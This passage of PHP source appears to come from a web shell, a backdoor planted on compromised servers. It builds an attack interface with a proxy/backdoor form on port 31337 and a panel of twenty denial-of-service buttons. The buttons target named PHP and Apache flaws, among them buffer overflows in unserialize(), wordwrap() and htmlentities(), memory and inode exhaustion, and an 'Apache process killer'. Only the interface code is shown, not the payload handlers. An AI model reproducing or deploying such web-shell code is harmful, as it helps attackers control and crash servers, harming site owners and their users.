                                    echo sr(40, "<b>" . $lang[$language . '_text10'] . $arrow . "</b>", in('text', 'proxy_port', 10, '31337'));
                                    echo sr(40, "<b>" . $lang[$language . '_text26'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>" . in('hidden', 'dir', 0, $dir));
                                    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5']));
                                    echo $te . "</td>" . $fe . "</tr></div></table>";
                                }
                                echo $table_up1 . div_title($lang[$language . '_text140'], 'id38') . $table_up2 . div('id38') . $ts . "<tr><td valign=top width=50%>" . $ts;
                                echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>" . $lang[$language . '_text141'] . "</div></b></font>";
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos1') . in('submit', 'submit', 0, 'Recursive memory exhaustion') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos2') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ pack() ] function') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos3') . in('submit', 'submit', 0, 'BoF in [ unserialize() ] function') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos4') . in('submit', 'submit', 0, 'Limit integer calculate (65535) in ZendEngine') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos5') . in('submit', 'submit', 0, 'SQlite [ dl() ] vulnerability') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos6') . in('submit', 'submit', 0, 'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos7') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos8') . in('submit', 'submit', 0, 'Apache process killer') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos9') . in('submit', 'submit', 0, 'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos10') . in('submit', 'submit', 0, 'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)') . $fe);
                                echo $te . "</td><td valign=top width=50%>" . $ts;
                                echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>" . $lang[$language . '_text141'] . "</div></b></font>";
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos11') . in('submit', 'submit', 0, 'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos12') . in('submit', 'submit', 0, 'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos13') . in('submit', 'submit', 0, 'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos14') . in('submit', 'submit', 0, 'BoF in [ str_ireplace() ] function (PHP <5.2.x)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos15') . in('submit', 'submit', 0, 'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos16') . in('submit', 'submit', 0, 'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos17') . in('submit', 'submit', 0, 'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos18') . in('submit', 'submit', 0, 'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos19') . in('submit', 'submit', 0, 'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)') . $fe);
                                echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos20') . in('submit', 'submit', 0, 'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)') . $fe);
                                echo $te . "</td></tr></div></table>";

